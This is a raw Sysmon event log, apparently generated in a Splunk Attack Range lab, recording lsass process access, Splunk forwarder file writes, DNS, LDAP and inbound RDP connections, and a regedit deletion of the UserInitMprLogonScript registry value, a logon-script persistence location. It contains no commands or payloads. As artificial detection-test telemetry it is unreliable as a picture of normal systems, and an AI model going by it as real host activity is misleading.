09:25:40.564{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057223Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:40.564{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001057222Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:40.330{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=242C8AF01B55FD2CA9115926378D7065,SHA256=D2D0CCD13550A96FF03E128C041BD032607E1CDFEC85CF41E2190BAF2DD1F990,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981687Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:40.123{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B76B58441548520A7090D9D551A762A1,SHA256=2A723EBFBFF0C44E6753C5F1E4453D1CD0C6BD6460F24B6C7E62F6566D62B833,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057221Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:37.924{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de60105-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057227Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:41.549{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D7E437A7DE2B2988041EEE90A4A56BF,SHA256=39357E9BA698573996A8DFEA6C12C7E4A68F0D4AA74CA3B51F306C318095D23A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981689Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:37.807{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59562-false10.0.1.12-8000- 23542300x8000000000000000981688Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:41.138{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75BBAF4D1C4FABE501C34769799A2DE9,SHA256=395869C3F8D74E1FCB20CD2A22B6EA9DD23C8EA3DB4E4370AA4F5F3E6265656F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057226Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:41.455{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=85A87A81343E8E921247D4C587BB46FA,SHA256=9EDA9582E12A2D9012987516887777336CAA0BD9CBB22CD8660F43229B2E0F10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057236Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.549{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DA300E9DF44CA0464D981D6D97B4A56,SHA256=46418CA72D90D607C43B9605F0B4CDCF1C23B2B0C1361BE897B3BFD9AAAED029,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981691Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:42.435{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4BB732D1EFD9DA93CE77E237267B9AE6,SHA256=876CF412ABDE493E5BF35DD1D0911B35F93FD9D01D988AE607351DEAF1EF0DE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981690Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:42.154{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFA29CF371CE39098AB6113B16EADA9B,SHA256=2DFFDD3909DCB73CFBEA167960731ABEB491D123AC4F049C47CEDD707900943D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057235Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.330{5EBD8912-8CBD-6151-0B00-00000000FD01}640NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnsMD5=1ED9955C15C95D865A46A537998C900F,SHA256=A28BE6F8BD9359291F4A7F554196F44D63B6A5B945818C2F739AF0C137FB0AF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057234Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.330{5EBD8912-8CBD-6151-0B00-00000000FD01}640NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnbMD5=88F0E987B938063283356F735A89A67F,SHA256=73CF4CD1A27917F90AFEE2C8107C9A6718DCC86FAF68F44542FACEE3025B3179,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057233Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:40.511{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54282-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local445microsoft-ds 354300x80000000000000001057232Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:40.511{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54282-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local445microsoft-ds 354300x80000000000000001057231Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:40.412{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-429.attackrange.local54281-false10.0.1.14win-dc-429.attackrange.local389ldap 354300x80000000000000001057230Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:40.412{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54281-false10.0.1.14win-dc-429.attackrange.local389ldap 354300x80000000000000001057229Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:40.402{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54280-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001057228Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:40.402{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54280-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 23542300x80000000000000001057275Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:43.849{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE1AD932D4C8FEBAFCE1A488ED250C5D,SHA256=8DAB5DCEDB06690F137A018509DDE5590C1473FEFE500EE9E65CD63D7010F145,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981693Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:39.365{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62888-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981692Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:25:43.154{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50BB5217A5175B369FB4C0A0943AF754,SHA256=50AAB69459F59670516A73853BA26C8F58DF1A5A6892D77DA52AB3979089A510,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057274Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.264{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local61650- 354300x80000000000000001057273Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.261{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local49972- 354300x80000000000000001057272Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.260{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local56181- 354300x80000000000000001057271Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.259{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local52232- 354300x80000000000000001057270Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.259{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53429- 354300x80000000000000001057269Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.258{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local50492- 354300x80000000000000001057268Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.257{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local52921- 354300x80000000000000001057267Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.256{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local55613- 354300x80000000000000001057266Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.255{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local52377- 354300x80000000000000001057265Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.254{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local50644- 354300x80000000000000001057264Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.253{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local61995- 354300x80000000000000001057263Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.251{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49971- 354300x80000000000000001057262Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.249{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local64173- 354300x80000000000000001057261Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.248{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local55605- 354300x80000000000000001057260Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.246{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local62166- 354300x80000000000000001057259Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.246{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local63402- 354300x80000000000000001057258Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.245{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local63748- 354300x80000000000000001057257Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.244{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local50563- 354300x80000000000000001057256Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.243{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local61725- 354300x80000000000000001057255Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.243{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53433- 354300x80000000000000001057254Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.241{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local50885- 354300x80000000000000001057253Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.241{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local65004- 354300x80000000000000001057252Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.240{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local64413- 354300x80000000000000001057251Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.239{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local65227- 354300x80000000000000001057250Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.236{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local51964- 354300x80000000000000001057249Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.235{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local53024- 354300x80000000000000001057248Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.234{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49750- 354300x80000000000000001057247Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.232{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local62137- 354300x80000000000000001057246Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.231{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local53176- 354300x80000000000000001057245Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.231{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54730- 354300x80000000000000001057244Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.229{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local64235- 354300x80000000000000001057243Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.226{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local62613- 354300x80000000000000001057242Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.212{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54285-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49672- 354300x80000000000000001057241Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.212{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54285-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49672- 354300x80000000000000001057240Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.211{5EBD8912-8CBF-6151-0D00-00000000FD01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54284-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 354300x80000000000000001057239Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.211{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local54284-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 354300x80000000000000001057238Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:42.179{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54283-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057237Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:43.271{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6688C5623B06B4D3CFA2845822296B43,SHA256=667C8E3AA0AEAEAA3AD85F79E7633F371C778AEB5E7E9B8333A0C7D229CA63B0,IMPHASH=00000000000000000000000000000000falsetrue 12241200x80000000000000001057290Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-DeleteValue2021-09-27 09:25:44.318{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exeHKU\S-1-5-21-2741910449-3045839080-4200281267-500\Environment\UserInitMprLogonScript 10341000x80000000000000001057289Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:44.318{5EBD8912-8D2A-6151-9600-00000000FD01}46324120C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057288Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:25:44.318{5EBD8912-8D2A-6151-9600-00000000FD01}46324120C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 